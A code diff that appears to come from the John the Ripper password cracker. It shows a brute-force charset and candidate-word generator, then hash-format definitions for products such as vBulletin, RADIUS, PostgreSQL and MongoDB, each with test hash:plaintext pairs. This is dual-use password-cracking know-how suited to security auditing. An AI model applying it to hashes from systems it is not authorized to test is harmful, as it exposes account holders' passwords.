+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,1300 @@
+# Here are some examples of DYNAMIC.
+# Please refer to ./doc/DYNAMIC for documentation on how to set these up.
+# Format names up to dynamic_999 are reserved for builtin functions.
+
+####################################################################
+# here is a synopsis of the formats in this file.  Please keep this up to date
+####################################################################
+# dynamic_1001: md5(md5(md5(md5($p))))
+# dynamic_1002: md5(md5(md5(md5(md5($p)))))
+# dynamic_1003: md5(md5($p).md5($p))
+# dynamic_1004: md5(md5(md5(md5(md5(md5($p))))))
+# dynamic_1005: md5(md5(md5(md5(md5(md5(md5($p)))))))
+# dynamic_1006: md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+# dynamic_1007: md5(md5($p).$s) (vBulletin)
+# dynamic_1008: md5($p.$s) (RADIUS User-Password)
+# dynamic_1009: md5($s.$p) (RADIUS Responses)
+# dynamic_1010: md5($p null_padded_to_len_100) RAdmin v2.x MD5
+# dynamic_1011: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1012: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1013: md5($p.PMD5(username)) (webEdition CMS)
+# dynamic_1014: md5($p.$s) (long salt)
+# dynamic_1015: md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+# dynamic_1016: md5($p.$s) (long salt)
+# dynamic_1017: md5($s.$p) (long salt)
+# dynamic_1018: md5(sha1(sha1($p)))
+# dynamic_1019: md5(sha1(sha1(md5($p))))
+# dynamic_1020: md5(sha1(md5($p)))
+# dynamic_1021: md5(sha1(md5(sha1($p))))
+# dynamic_1022: md5(sha1(md5(sha1(md5($p)))))
+# dynamic_1023: sha1($p) (hash truncated to length 32)
+# dynamic_1024: sha1(md5($p)) (hash truncated to length 32)
+# dynamic_1025: sha1(md5(md5($p))) (hash truncated to length 32)
+# dynamic_1026: sha1(sha1($p)) (hash truncated to length 32)
+# dynamic_1027: sha1(sha1(sha1($p))) (hash truncated to length 32)
+# dynamic_1028: sha1(sha1_raw($p)) (hash truncated to length 32)
+# dynamic_1029: sha256($p) (hash truncated to length 32)
+# dynamic_1030: whirlpool($p) (hash truncated to length 32)
+# dynamic_1031: gost($p) (hash truncated to length 32)
+# dynamic_1032: sha1_64(utf16($p)) (PeopleSoft)
+# dynamic_1033: sha1_64(utf16($p).$s)
+# dynamic_1034: md5($p.$u) (PostgreSQL MD5)
+# dynamic_1300: md5(md5_raw($p))
+# dynamic_1350: md5(md5($s.$p):$s)
+# dynamic_1400: sha1(utf16($p)) (Microsoft CREDHIST)
+# dynamic_1401: md5($u.\nskyper\n.$p) (Skype MD5)
+# dynamic_1501: sha1($s.sha1($p)) (Redmine)
+# dynamic_1502: sha1(sha1($p).$s) (XenForo SHA-1)
+# dynamic_1503: sha256(sha256($p).$s) (XenForo SHA-256)
+# dynamic_1504: sha1($s.$p.$s)
+# dynamic_1505: md5($p.$s.md5($p.$s))
+# dynamic_1506: md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+# dynamic_1507: sha1(utf16($const.$p)) (Mcafee master pass)
+# dynamic_1518: md5(sha1($p).md5($p).sha1($p))
+# dynamic_1528: sha256($s.$p.$s) (Telegram for Android)
+# dynamic_1529: sha1($p null_padded_to_len_32) (DeepSound)
+# dynamic_1550: md5($u.:mongo:.$p) (MONGODB-CR system hash)
+# dynamic_1551: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1552: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1560: md5($s.$p.$s2) (SocialEngine)
+# dynamic_1588: sha256($s.sha1($p)) (ColdFusion 11)
+# dynamic_1590: sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+# dynamic_1592: sha1($s.sha1($s.sha1($p))) (wbb3)
+# dynamic_1600: sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+# dynamic_1608: sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+
+####################################################################
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1001]
+# expression shown will be the string:   dynamic_1001 md5(md5(md5(md5($p))))
+Expression=md5(md5(md5(md5($p))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+#if !ARCH_LITTLE_ENDIAN  // unfortunatly, we have no #define here, so we always have to call this function, in a script or they will fail on BE boxes :(
+Func=DynamicFunc__set_input2_len_32_cleartop
+#endif
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1001$57200e13b490d4ae47d5e19be026b057:test1
+Test=$dynamic_1001$c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
+Test=$dynamic_1001$0ae9549604e539a249c1fa9f5e5fb73b:test3
+# TestM= will ONLY load in an MMX or SSE2 build of JtR.
+# TestF= will ONLY load in a non-MMX and nonSSE build (flat oSSL build, or generic)
+TestM=$dynamic_1001$94c59ab02fcd39f3ff9a4e553a4afcb6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1001$a8b46c02f1680860622df837fa78c3e4:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1002]
+# expression shown will be the string:   dynamic_1002 md5(md5(md5(md5(md5($p)))))
+Expression=md5(md5(md5(md5(md5($p)))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 5 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1002$25de8cd0b0cf69c5b5bc19c8ee64adab:test1
+Test=$dynamic_1002$a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
+Test=$dynamic_1002$4cb029bd5b4ef79f785ca685caf17bf8:test3
+TestM=$dynamic_1002$5a791c6c9de2f488a8155f35900348b0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1002$b8da59d26b6494df42b8c0f1fba8cd7e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5(md5($p).md5($p))
+####################################################################
+[List.Generic:dynamic_1003]
+# expression shown will be the string:   dynamic_1003 md5(md5($p).md5($p))
+Expression=md5(md5($p).md5($p))
+# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
+# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
+# Thus, we need a non-sse2 safe flag.
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
+##JF Func=DynamicFunc__crypt_md5
+##JF Func=DynamicFunc__clean_input2_kwik
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__crypt_md5_in2_to_out1
+
+# much more optimal.   From 1118k to 2155k on an SSE2 box.
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__append_input_from_input
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+# These are test strings for this format.
+Test=$dynamic_1003$478b10974f15e7295883224fd286ccba:test1
+Test=$dynamic_1003$18a59101e6c6fb38260d542a394ecb22:thatsworking
+Test=$dynamic_1003$630b01b68b6db6fd43a751f8147d1faf:test3
+Test=$dynamic_1003$2dbecd858c29d5602da78204af7dfe1b:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1004]
+# expression shown will be the string:   dynamic_1004 md5(md5(md5(md5(md5(md5($p))))))
+Expression=md5(md5(md5(md5(md5(md5($p))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 6 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1004$de1b991dd27fb9813e88b957a455dccd:test1
+Test=$dynamic_1004$6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
+Test=$dynamic_1004$a977990e521c5d1d17c6d65fdf2681b4:test3
+TestM=$dynamic_1004$e475d31b00626080fc01ca4832a33293:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1004$f60eca1ad34608b7c6b1b04379b3fee3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1005]
+# expression shown will be the string:   dynamic_1005 md5(md5(md5(md5(md5(md5(md5($p)))))))
+Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 7 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1005$784c527d0d92873ff9c0773e1c35621d:test1
+Test=$dynamic_1005$efcbbe6331caecf0e7f40160e65aadcc:thatsworking
+Test=$dynamic_1005$abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
+TestM=$dynamic_1005$8f853f8abf74a8e686c213a9849d9beb:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1005$37e4fc15b5dc59286aee85f4b7008315:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1006]
+# expression shown will be the string:   dynamic_1006 md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 8 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1006$1ec1f32398f64cab51183f63630eceea:test1
+Test=$dynamic_1006$f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
+Test=$dynamic_1006$e9d38522b5eeec753332e576e2e0fe5d:test3
+TestM=$dynamic_1006$399310c857c0d83b931441d514528ee6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1006$e89d92a2291b5b43b6697c51d722ae8b:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
+####################################################################
+[List.Generic:dynamic_1007]
+# expression shown will be the string:   dynamic_1007 md5(md5($p).$s) [vBulletin]
+Expression=md5(md5($p).$s) (vBulletin)
+# Flag needed here, is Salt.  There is no 'fixed' saltlen.
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+# vBulletin has a 'fixed' 3 byte salt, so list the fixed size  (restriction removed).
+SaltLen=-23
+SaltLenX86=-64
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform vBulletin hash
+Func=DynamicFunc__set_input_len_32_cleartop
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1007$daa61d77e218e42060c2fa198ac1feaf$SXB:test1
+Test=$dynamic_1007$de56b00bb15d6db79204bd44383469bc$T &:thatsworking
+Test=$dynamic_1007$fb685c6f469f6e549c85e4c1fb5a65a6$HEX$5C483A:test3
+Test=$dynamic_1007$5dd8145e0d1e2499bce05dcb4bce5cdf$HEX$24324F:testme
+TestM=$dynamic_1007$09019afd1303ff078ba323569ac05ea5$123:1234567890123456789012345678901234567890123456789012
+TestF=$dynamic_1007$1eff62d90df7e82566f75f7cfb316f6e$PS9:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Dynamic type for algorithm used in RADIUS User-Password attribute md5($p.$s)
+####################################################################
+[List.Generic:dynamic_1008]
+# expression shown will be this string:
+Expression=md5($p.$s) (RADIUS User-Password)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+# The salt has a fixed length of 16 bytes
+Saltlen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+# unfortunately, these next 2 have embedded NULLs, so at this time they have been removed.
+# later we will get dynamic working with these also.
+#Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
+#Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
+TestM=$dynamic_1008$6bf84723242c758538951ebfcbe82498$Zm8EXfUeRrEJMx5b:123456789012345678901234567890123456789
+TestF=$dynamic_1008$7978620b9b48b1d6e322bfe5b081bf3e$yH9RErqH2ktDYesl:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
+#
+# Also used by a "popular" backup solution
+# select id, name, emailid, password from administrator;
+# hashlib.md5((str(id) + pwd)).hexdigest()
+######################################################################
+[List.Generic:dynamic_1009]
+Expression=md5($s.$p) (RADIUS Responses)
+Flag=MGF_SALTED
+Saltlen=-16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1
+Test=$dynamic_1009$05ed3fc5e044d559290c400254e568c9$1:hackme
+TestM=$dynamic_1009$9619094908f5c9f29eb95eadefae84c3$ex5fKtjhZwVMCi2C:123456789012345678901234567890123456789
+TestF=$dynamic_1009$92cfbd6aadc48b2ef97ca2699037dea6$73WkPYCT2CxnQ8pt:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RAdmin v2.x Responses md5($p.NULL-to-100-bytes)
+# v2, where keys are in input, and set_input_len_100 'cleans' up if needed.
+######################################################################
+[List.Generic:dynamic_1010]
+Expression=md5($p null_padded_to_len_100) RAdmin v2.x MD5
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Func=DynamicFunc__set_input_len_100
+##JF Func=DynamicFunc__crypt_md5
+
+# MUCH faster.  Went from 1930k to 5600k
+MaxInputLen=99
+MaxInputLenX86=99
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_POOR_OMP
+Func=DynamicFunc__set_input_len_100
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+Test=$dynamic_1010$B137F09CF92F465CABCA06AB1B283C1F:lastwolf
+Test=$dynamic_1010$14e897b1a9354f875df51047bb1a0765:podebradka
+Test=$dynamic_1010$02ba5e187e2589be6f80da0046aa7e3c:12345678
+Test=$dynamic_1010$b4e13c7149ebde51e510959f30319ac7:firebaLL
+Test=$dynamic_1010$3d2c8cae4621edf8abb081408569482b:yamaha12345
+Test=$dynamic_1010$60cb8e411b02c10ecc3c98e29e830de8:xplicit
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+####################################################################
+[List.Generic:dynamic_1011]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+SaltLen=-55
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1011$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1011$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1011$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1011$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1011$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+# Twice as fast as dynamic_1011 since md5($s) is pre-computed!
+####################################################################
+[List.Generic:dynamic_1012]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+MaxInputLenX86=48
+SaltLen=-110
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1012$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1012$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1012$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1012$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1012$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+## DYNAMIC type for webEdition CMS md5($p.PMD5(username))
+## > select md5(username),passwd,UseSalt from tblUser
+## PMD5(username), pre-computed md5 of username is salt
+#####################################################################
+[List.Generic:dynamic_1013]
+Expression=md5($p.PMD5(username)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+MaxInputLen=23
+SaltLen=32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1013$14f8b3781f19a3b7ea520311482ce207$f2df0ddd3129c68b1ae7be05779ebeb3:openwall
+TestM=$dynamic_1013$b8db62204359efcbfc92da2d697d21cb$f3ae4d2b2c3600df57bbeab163eac04b:12345678901234567890123
+TestF=$dynamic_1013$61f55f04f8f4e05392415181bcf57420$5e87dbf3663cbead467fc645c5c9586d:123456789012345678901234567890123456789012345678
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+####################################################################
+[List.Generic:dynamic_1014]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+##JF Went from 1376k/1100k to 3483k/2600k by switching to flat buffer sse2
+##JF Flag=MGF_NOTSSE2Safe
+Flag=MGF_FLAT_BUFFERS
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+##JF MaxInputLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+##JF Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1014$c0dbfba522fad4054da9808a2fa09580$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:test
+Test=$dynamic_1014$6130b0e84d387ffd460fc83cffcc1426$bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbc:aaaa
+Test=$dynamic_1014$399df23011bb3742e83011c1074187e2$cccccccccccccccccccccccccccccccccccccccccccccccccccd:bbbb
+Test=$dynamic_1014$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1014$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1014$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+Test=$dynamic_1014$e463b65f14643afd970c7ea7e7efeb0f$123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890:12345678901234567890123456789012
+
+####################################################################
+# Dynamic type for md5(md5($p.$u).$s) for PostgreSQL 'pass the hash' weakness
+# See also dynamic_1034 for PostgreSQL MD5
+# http://www.openwall.com/lists/oss-security/2015/03/03/12
+####################################################################
+[List.Generic:dynamic_1015]
+Expression=md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+Flag=MGF_SALTED
+Flag=MGF_USERNAME
+MaxInputLen=31
+MaxInputLenX86=56
+SaltLen=-23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d:openwall:postgres
+Test=$dynamic_1015$1c4e11fb51835c3bbe9851ec91ec1375$HEX$c31803a2:password:postgres
+Test=$dynamic_1015$bf2a64f35feba7bf1b633d60393c1356$HEX$684697c8:openwall:postgres
+# repeat one test in the format that is used in john.pot
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d242455706f737467726573:openwall
+TestM=$dynamic_1015$c99b3494687ed9895d4ffca184a9daf5$M6krNt:1234567890123456789012345678901:usrx
+TestF=$dynamic_1015$5618a66e934dfef13cae2d06d71bdf75$usrwxT:12345678901234567890123456789012345678901234567890123456:01234
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+#  NOTE, we should use dynamic_2001 and not this hash.
+####################################################################
+[List.Generic:dynamic_1016]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$e30003fa000100000001000000000000000000000000000000000000000000000000000000000000d7dd1060ee06bec2:secret
+# repeat that hash in exactly the same form that is used in john.pot
+#Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$48455824653330303033666130303031303030303030303130303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303064376464313036306565303662656332:secret
+
+####################################################################
+# Dynamic type for md5($s.$p) for long salts
+#  NOTE, we should use dynamic_2004 and not this hash.
+####################################################################
+[List.Generic:dynamic_1017]
+# expression shown will be this string:
+Expression=md5($s.$p) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=55
+MaxInputLen=55
+SaltLen=-192
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
